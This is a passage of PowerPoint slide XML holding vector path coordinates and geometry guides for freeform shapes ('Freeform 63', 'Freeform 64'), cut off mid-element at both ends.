                        <a:pt x="514" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="551" y="545"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="577" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="205" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="514" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="714" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="724" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="730" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="477"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="704" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="677" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="608"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="520" y="698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="708"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="692"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="672"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="326" y="640"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="304" y="619"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="509"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:ln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8" name="Freeform 63"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7016750" y="5294313"/>
                  <a:ext cx="204788" cy="195262"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 289 w 569"/>
                    <a:gd name="T1" fmla="*/ 367 h 541"/>
                    <a:gd name="T2" fmla="*/ 331 w 569"/>
                    <a:gd name="T3" fmla="*/ 393 h 541"/>
                    <a:gd name="T4" fmla="*/ 373 w 569"/>
                    <a:gd name="T5" fmla="*/ 409 h 541"/>
                    <a:gd name="T6" fmla="*/ 410 w 569"/>
                    <a:gd name="T7" fmla="*/ 409 h 541"/>
                    <a:gd name="T8" fmla="*/ 426 w 569"/>
                    <a:gd name="T9" fmla="*/ 404 h 541"/>
                    <a:gd name="T10" fmla="*/ 436 w 569"/>
                    <a:gd name="T11" fmla="*/ 388 h 541"/>
                    <a:gd name="T12" fmla="*/ 452 w 569"/>
                    <a:gd name="T13" fmla="*/ 362 h 541"/>
                    <a:gd name="T14" fmla="*/ 447 w 569"/>
                    <a:gd name="T15" fmla="*/ 331 h 541"/>
                    <a:gd name="T16" fmla="*/ 431 w 569"/>
                    <a:gd name="T17" fmla="*/ 299 h 541"/>
                    <a:gd name="T18" fmla="*/ 478 w 569"/>
                    <a:gd name="T19" fmla="*/ 162 h 541"/>
                    <a:gd name="T20" fmla="*/ 515 w 569"/>
                    <a:gd name="T21" fmla="*/ 194 h 541"/>
                    <a:gd name="T22" fmla="*/ 557 w 569"/>
                    <a:gd name="T23" fmla="*/ 262 h 541"/>
                    <a:gd name="T24" fmla="*/ 568 w 569"/>
                    <a:gd name="T25" fmla="*/ 294 h 541"/>
                    <a:gd name="T26" fmla="*/ 557 w 569"/>
                    <a:gd name="T27" fmla="*/ 367 h 541"/>
                    <a:gd name="T28" fmla="*/ 510 w 569"/>
                    <a:gd name="T29" fmla="*/ 446 h 541"/>
                    <a:gd name="T30" fmla="*/ 488 w 569"/>
                    <a:gd name="T31" fmla="*/ 472 h 541"/>
                    <a:gd name="T32" fmla="*/ 441 w 569"/>
                    <a:gd name="T33" fmla="*/ 514 h 541"/>
                    <a:gd name="T34" fmla="*/ 415 w 569"/>
                    <a:gd name="T35" fmla="*/ 525 h 541"/>
                    <a:gd name="T36" fmla="*/ 368 w 569"/>
                    <a:gd name="T37" fmla="*/ 535 h 541"/>
                    <a:gd name="T38" fmla="*/ 321 w 569"/>
                    <a:gd name="T39" fmla="*/ 535 h 541"/>
                    <a:gd name="T40" fmla="*/ 279 w 569"/>
                    <a:gd name="T41" fmla="*/ 519 h 541"/>
                    <a:gd name="T42" fmla="*/ 231 w 569"/>
                    <a:gd name="T43" fmla="*/ 499 h 541"/>
                    <a:gd name="T44" fmla="*/ 147 w 569"/>
                    <a:gd name="T45" fmla="*/ 436 h 541"/>
                    <a:gd name="T46" fmla="*/ 64 w 569"/>
                    <a:gd name="T47" fmla="*/ 362 h 541"/>
                    <a:gd name="T48" fmla="*/ 32 w 569"/>
                    <a:gd name="T49" fmla="*/ 320 h 541"/>
                    <a:gd name="T50" fmla="*/ 11 w 569"/>
                    <a:gd name="T51" fmla="*/ 278 h 541"/>
                    <a:gd name="T52" fmla="*/ 0 w 569"/>
                    <a:gd name="T53" fmla="*/ 236 h 541"/>
                    <a:gd name="T54" fmla="*/ 0 w 569"/>
                    <a:gd name="T55" fmla="*/ 189 h 541"/>
                    <a:gd name="T56" fmla="*/ 6 w 569"/>
                    <a:gd name="T57" fmla="*/ 162 h 541"/>
                    <a:gd name="T58" fmla="*/ 37 w 569"/>
                    <a:gd name="T59" fmla="*/ 110 h 541"/>
                    <a:gd name="T60" fmla="*/ 53 w 569"/>
                    <a:gd name="T61" fmla="*/ 78 h 541"/>
                    <a:gd name="T62" fmla="*/ 116 w 569"/>
                    <a:gd name="T63" fmla="*/ 26 h 541"/>
                    <a:gd name="T64" fmla="*/ 132 w 569"/>
                    <a:gd name="T65" fmla="*/ 10 h 541"/>
                    <a:gd name="T66" fmla="*/ 216 w 569"/>
                    <a:gd name="T67" fmla="*/ 0 h 541"/>
                    <a:gd name="T68" fmla="*/ 263 w 569"/>
                    <a:gd name="T69" fmla="*/ 10 h 541"/>
                    <a:gd name="T70" fmla="*/ 305 w 569"/>
                    <a:gd name="T71" fmla="*/ 31 h 541"/>
                    <a:gd name="T72" fmla="*/ 405 w 569"/>
                    <a:gd name="T73" fmla="*/ 94 h 541"/>
                    <a:gd name="T74" fmla="*/ 258 w 569"/>
                    <a:gd name="T75" fmla="*/ 336 h 541"/>
                    <a:gd name="T76" fmla="*/ 231 w 569"/>
                    <a:gd name="T77" fmla="*/ 136 h 541"/>
                    <a:gd name="T78" fmla="*/ 211 w 569"/>
                    <a:gd name="T79" fmla="*/ 126 h 541"/>
                    <a:gd name="T80" fmla="*/ 190 w 569"/>
                    <a:gd name="T81" fmla="*/ 121 h 541"/>
                    <a:gd name="T82" fmla="*/ 158 w 569"/>
                    <a:gd name="T83" fmla="*/ 121 h 541"/>
                    <a:gd name="T84" fmla="*/ 142 w 569"/>
                    <a:gd name="T85" fmla="*/ 131 h 541"/>
                    <a:gd name="T86" fmla="*/ 127 w 569"/>
                    <a:gd name="T87" fmla="*/ 147 h 541"/>
                    <a:gd name="T88" fmla="*/ 116 w 569"/>
                    <a:gd name="T89" fmla="*/ 178 h 541"/>
                    <a:gd name="T90" fmla="*/ 116 w 569"/>
                    <a:gd name="T91" fmla="*/ 194 h 541"/>
                    <a:gd name="T92" fmla="*/ 121 w 569"/>
                    <a:gd name="T93" fmla="*/ 215 h 541"/>
                    <a:gd name="T94" fmla="*/ 142 w 569"/>
                    <a:gd name="T95" fmla="*/ 246 h 541"/>
                    <a:gd name="T96" fmla="*/ 190 w 569"/>
                    <a:gd name="T97" fmla="*/ 283 h 541"/>
                    <a:gd name="T98" fmla="*/ 279 w 569"/>
                    <a:gd name="T99" fmla="*/ 168 h 5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569" h="541">
                      <a:moveTo>
                        <a:pt x="289" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="400" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="405" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="231" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="211" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="13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9" name="Freeform 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7121525" y="5149850"/>
                  <a:ext cx="206375" cy="190500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 226 w 574"/>
                    <a:gd name="T1" fmla="*/ 142 h 531"/>
                    <a:gd name="T2" fmla="*/ 189 w 574"/>
                    <a:gd name="T3" fmla="*/ 131 h 531"/>
                    <a:gd name="T4" fmla="*/ 158 w 574"/>
                    <a:gd name="T5" fmla="*/ 131 h 531"/>
                    <a:gd name="T6" fmla="*/ 147 w 574"/>
                    <a:gd name="T7" fmla="*/ 136 h 531"/>
                    <a:gd name="T8" fmla="*/ 132 w 574"/>
                    <a:gd name="T9" fmla="*/ 152 h 531"/>
                    <a:gd name="T10" fmla="*/ 121 w 574"/>
                    <a:gd name="T11" fmla="*/ 194 h 531"/>
                    <a:gd name="T12" fmla="*/ 121 w 574"/>
                    <a:gd name="T13" fmla="*/ 215 h 531"/>
                    <a:gd name="T14" fmla="*/ 132 w 574"/>
                    <a:gd name="T15" fmla="*/ 236 h 531"/>
                    <a:gd name="T16" fmla="*/ 179 w 574"/>
                    <a:gd name="T17" fmla="*/ 278 h 531"/>
                    <a:gd name="T18" fmla="*/ 247 w 574"/>
                    <a:gd name="T19" fmla="*/ 325 h 531"/>
                    <a:gd name="T20" fmla="*/ 320 w 574"/>
                    <a:gd name="T21" fmla="*/ 373 h 531"/>
                    <a:gd name="T22" fmla="*/ 352 w 574"/>
                    <a:gd name="T23" fmla="*/ 388 h 531"/>
                    <a:gd name="T24" fmla="*/ 378 w 574"/>
                    <a:gd name="T25" fmla="*/ 399 h 531"/>
                    <a:gd name="T26" fmla="*/ 420 w 574"/>
                    <a:gd name="T27" fmla="*/ 399 h 531"/>
                    <a:gd name="T28" fmla="*/ 436 w 574"/>
                    <a:gd name="T29" fmla="*/ 388 h 531"/>
                    <a:gd name="T30" fmla="*/ 452 w 574"/>
                    <a:gd name="T31" fmla="*/ 373 h 531"/>
                    <a:gd name="T32" fmla="*/ 463 w 574"/>
                    <a:gd name="T33" fmla="*/ 341 h 531"/>
                    <a:gd name="T34" fmla="*/ 452 w 574"/>
                    <a:gd name="T35" fmla="*/ 315 h 531"/>
                    <a:gd name="T36" fmla="*/ 441 w 574"/>
                    <a:gd name="T37" fmla="*/ 294 h 531"/>
                    <a:gd name="T38" fmla="*/ 378 w 574"/>
                    <a:gd name="T39" fmla="*/ 241 h 531"/>
                    <a:gd name="T40" fmla="*/ 457 w 574"/>
                    <a:gd name="T41" fmla="*/ 131 h 531"/>
                    <a:gd name="T42" fmla="*/ 530 w 574"/>
                    <a:gd name="T43" fmla="*/ 194 h 531"/>
                    <a:gd name="T44" fmla="*/ 567 w 574"/>
                    <a:gd name="T45" fmla="*/ 262 h 531"/>
                    <a:gd name="T46" fmla="*/ 573 w 574"/>
                    <a:gd name="T47" fmla="*/ 304 h 531"/>
                    <a:gd name="T48" fmla="*/ 552 w 574"/>
                    <a:gd name="T49" fmla="*/ 388 h 531"/>
                    <a:gd name="T50" fmla="*/ 525 w 574"/>
                    <a:gd name="T51" fmla="*/ 430 h 531"/>
                    <a:gd name="T52" fmla="*/ 463 w 574"/>
                    <a:gd name="T53" fmla="*/ 504 h 531"/>
                    <a:gd name="T54" fmla="*/ 426 w 574"/>
                    <a:gd name="T55" fmla="*/ 525 h 531"/>
                    <a:gd name="T56" fmla="*/ 383 w 574"/>
                    <a:gd name="T57" fmla="*/ 530 h 531"/>
                    <a:gd name="T58" fmla="*/ 289 w 574"/>
                    <a:gd name="T59" fmla="*/ 514 h 531"/>
                    <a:gd name="T60" fmla="*/ 231 w 574"/>
                    <a:gd name="T61" fmla="*/ 488 h 531"/>
                    <a:gd name="T62" fmla="*/ 163 w 574"/>
                    <a:gd name="T63" fmla="*/ 446 h 531"/>
                    <a:gd name="T64" fmla="*/ 52 w 574"/>
                    <a:gd name="T65" fmla="*/ 351 h 531"/>
                    <a:gd name="T66" fmla="*/ 22 w 574"/>
                    <a:gd name="T67" fmla="*/ 304 h 531"/>
                    <a:gd name="T68" fmla="*/ 5 w 574"/>
                    <a:gd name="T69" fmla="*/ 262 h 531"/>
                    <a:gd name="T70" fmla="*/ 5 w 574"/>
                    <a:gd name="T71" fmla="*/ 178 h 531"/>
                    <a:gd name="T72" fmla="*/ 22 w 574"/>
                    <a:gd name="T73" fmla="*/ 136 h 531"/>
                    <a:gd name="T74" fmla="*/ 48 w 574"/>
                    <a:gd name="T75" fmla="*/ 94 h 531"/>
                    <a:gd name="T76" fmla="*/ 111 w 574"/>
                    <a:gd name="T77" fmla="*/ 31 h 531"/>
                    <a:gd name="T78" fmla="*/ 179 w 574"/>
                    <a:gd name="T79" fmla="*/ 0 h 531"/>
                    <a:gd name="T80" fmla="*/ 216 w 574"/>
                    <a:gd name="T81" fmla="*/ 0 h 531"/>
                    <a:gd name="T82" fmla="*/ 299 w 574"/>
                    <a:gd name="T83" fmla="*/ 26 h 531"/>
                    <a:gd name="T84" fmla="*/ 263 w 574"/>
                    <a:gd name="T85" fmla="*/ 163 h 531"/>
                    <a:gd name="T86" fmla="*/ 226 w 574"/>
                    <a:gd name="T87" fmla="*/ 142 h 5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574" h="531">
                      <a:moveTo>
                        <a:pt x="226" y="142"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="126"/>
                      </a:lnTo>
